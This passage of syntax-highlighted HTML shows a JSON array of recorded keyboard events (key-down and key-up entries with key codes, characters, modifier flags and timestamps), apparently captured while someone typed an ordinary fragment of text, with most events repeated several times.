class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyA"</span><span class="p">,</span><span class="s2">"a"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">8360.745</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyR"</span><span class="p">,</span><span class="s2">"r"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">8397.33</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyR"</span><span class="p">,</span><span class="s2">"r"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">8397.67</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyR"</span><span class="p">,</span><span class="s2">"r"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">8398.28</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyO"</span><span class="p">,</span><span class="s2">"o"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">8445.02</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyO"</span><span class="p">,</span><span class="s2">"o"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">8445.225</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyO"</span><span class="p">,</span><span class="s2">"o"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">8445.65</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyU"</span><span class="p">,</span><span class="s2">"u"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">8493.105</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyU"</span><span class="p">,</span><span class="s2">"u"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">8493.385</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyU"</span><span class="p">,</span><span class="s2">"u"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">8493.975</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyO"</span><span class="p">,</span><span class="s2">"o"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">8516.82</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyO"</span><span class="p">,</span><span class="s2">"o"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">8517.05</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyO"</span><span class="p">,</span><span class="s2">"o"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">8517.61</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyU"</span><span class="p">,</span><span class="s2">"u"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">8518.105</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyU"</span><span class="p">,</span><span class="s2">"u"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">8518.53</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyU"</span><span class="p">,</span><span class="s2">"u"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">8518.835</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyA"</span><span class="p">,</span><span class="s2">"a"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">8533</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyA"</span><span class="p">,</span><span class="s2">"a"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">8533.19</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyA"</span><span class="p">,</span><span class="s2">"a"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">8533.61</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyR"</span><span class="p">,</span><span class="s2">"r"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">8549.085</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyR"</span><span class="p">,</span><span class="s2">"r"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">8564.805</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyR"</span><span class="p">,</span><span class="s2">"r"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">8565.32</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyN"</span><span class="p">,</span><span class="s2">"n"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">8638.355</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyN"</span><span class="p">,</span><span class="s2">"n"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">8638.68</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyN"</span><span class="p">,</span><span class="s2">"n"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">8639.465</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyD"</span><span class="p">,</span><span class="s2">"d"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">8717.045</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyD"</span><span class="p">,</span><span class="s2">"d"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">8717.29</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyD"</span><span class="p">,</span><span class="s2">"d"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">8717.725</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyN"</span><span class="p">,</span><span class="s2">"n"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">8796.75</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyN"</span><span class="p">,</span><span class="s2">"n"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">8796.99</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyN"</span><span class="p">,</span><span class="s2">"n"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">8814.205</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyD"</span><span class="p">,</span><span class="s2">"d"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">8884.74</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyD"</span><span class="p">,</span><span class="s2">"d"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">8884.94</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyD"</span><span class="p">,</span><span class="s2">"d"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">8885.375</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyU"</span><span class="p">,</span><span class="s2">"u"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">8973.165</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyU"</span><span class="p">,</span><span class="s2">"u"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">8973.44</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyU"</span><span class="p">,</span><span class="s2">"u"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">8973.97</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyU"</span><span class="p">,</span><span class="s2">"u"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">9052.815</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyU"</span><span class="p">,</span><span class="s2">"u"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">9053.055</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyU"</span><span class="p">,</span><span class="s2">"u"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">9053.535</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyS"</span><span class="p">,</span><span class="s2">"s"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">9068.72</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyS"</span><span class="p">,</span><span class="s2">"s"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">9069.175</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyS"</span><span class="p">,</span><span class="s2">"s"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">9069.55</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"Space"</span><span class="p">,</span><span class="s2">" "</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">9133.025</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"Space"</span><span class="p">,</span><span class="s2">" "</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">9133.275</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"Space"</span><span class="p">,</span><span class="s2">" "</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">9133.715</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyS"</span><span class="p">,</span><span class="s2">"s"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">9173</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyS"</span><span class="p">,</span><span class="s2">"s"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">9173.215</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyS"</span><span class="p">,</span><span class="s2">"s"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">9173.73</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"Space"</span><span class="p">,</span><span class="s2">" "</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">9212.76</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"Space"</span><span class="p">,</span><span class="s2">" "</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">9225.385</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"Space"</span><span class="p">,</span><span class="s2">" "</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">9226.03</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyF"</span><span class="p">,</span><span class="s2">"f"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">9421.13</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyF"</span><span class="p">,</span><span class="s2">"f"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">9421.365</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyF"</span><span class="p">,</span><span class="s2">"f"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">9421.91</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyF"</span><span class="p">,</span><span class="s2">"f"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">9422.315</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyF"</span><span class="p">,</span><span class="s2">"f"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">9476.82</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyF"</span><span class="p">,</span><span class="s2">"f"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">9477.015</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyF"</span><span class="p">,</span><span class="s2">"f"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">9477.46</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyF"</span><span class="p">,</span><span class="s2">"f"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">9477.715</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyR"</span><span class="p">,</span><span class="s2">"r"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">9565.155</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyR"</span><span class="p">,</span><span class="s2">"r"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">9565.385</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyR"</span><span class="p">,</span><span class="s2">"r"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">9565.795</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyR"</span><span class="p">,</span><span class="s2">"r"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">9566.04</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyO"</span><span class="p">,</span><span class="s2">"o"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">9606.39</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyO"</span><span class="p">,</span><span class="s2">"o"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">9606.625</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyO"</span><span class="p">,</span><span class="s2">"o"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">9607.065</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyO"</span><span class="p">,</span><span class="s2">"o"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">9607.355</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyO"</span><span class="p">,</span><span class="s2">"o"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">9676.815</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyO"</span><span class="p">,</span><span class="s2">"o"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">9677.015</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyO"</span><span class="p">,</span><span class="s2">"o"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">9691.495</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyO"</span><span class="p">,</span><span class="s2">"o"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">9692.19</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyR"</span><span class="p">,</span><span class="s2">"r"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">9700.965</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyR"</span><span class="p">,</span><span class="s2">"r"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">9701.205</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyR"</span><span class="p">,</span><span class="s2">"r"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">9701.85</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyR"</span><span class="p">,</span><span class="s2">"r"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">9702.405</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyM"</span><span class="p">,</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">9733.16</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyM"</span><span class="p">,</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">9733.385</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyM"</span><span class="p">,</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">9733.9</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyM"</span><span class="p">,</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">9734.34</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyM"</span><span class="p">,</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">9836.835</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyM"</span><span class="p">,</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">9837.075</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyM"</span><span class="p">,</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">9838.42</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyM"</span><span class="p">,</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">9838.965</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"ShiftLeft"</span><span class="p">,</span><span class="s2">"Shift"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0100"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">9949.645</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"ShiftLeft"</span><span class="p">,</span><span class="s2">"Shift"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0100"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">9949.885</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"ShiftLeft"</span><span class="p">,</span><span class="s2">"Shift"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0100"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">9950.5</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"ShiftLeft"</span><span class="p">,</span><span class="s2">"Shift"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0100"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">9950.92</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyM"</span><span class="p">,</span><span class="s2">"M"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0100"</span><span 